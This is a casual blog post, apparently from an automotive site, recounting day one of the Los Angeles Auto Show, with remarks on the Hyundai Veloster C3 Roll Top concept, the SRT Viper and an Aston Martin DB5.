Lights…Camera…Action! The Los Angeles Auto Show is underway.

As you can imagine then, as crankandpiston makes its way to Los Angeles Convention Center for day one of the show, the traffic is hideous (it takes just over an hour to cover 22km). With my $15 parking fee dealt with in double quick time, I’m keen to put the 32GB memory card in my camera to work. Well, after I’ve put my Scaletrix skills to the test of course.
One of the first juicy items I found was the Hyundai Veloster C3 Roll Top concept, which was getting a lot of attention. Whilst ogling, Chief Designer Chris Chapman walked up and greeted me. Not your average show dweller, I’m sure you’ll admit.

This proved harder than I’d imagined, a large wave of photographers and journalists nearly bowling me over as they rushed to see the car’s debut. Anybody who’s seen Disney’s The Lion King will be familiar with little Simba and wildebeest stampeded scene, and that’s the nearest comparison I can draw. Who knows, if I had been trampled, I might have been the star of the next big 3D Hollywood Blockbuster.
After hiding behind a garbage can for cover, and letting the crowd dissipate, I was soon distracted by the beautiful model standing next to the equally stunning SRT Viper. Don’t call it the Dodge Viper, as it has for some time now been part of the ‘SRT’ brand. You can however call it ‘a brute’, since the 8.4-litre V10 under the bonnet throws out a phenomenal 640hp. The glare from the headlights could well turn any man into a frightened rabbit at the click of your fingers too.
Here was one beauty I couldn’t ignore though. The return of 007 in Skyfall has the entire globe in the midst of James Bond fever, and you can’t spell ‘Bond’ without ‘Aston Martin DB5 with retractable front bumpers and passenger ejector seat’. Just goes to show that American debuts don’t always steal the show.
Beautiful cars, beautiful women, crazy crowds, there is no mistaking where I am. I am at the LA Auto Show.
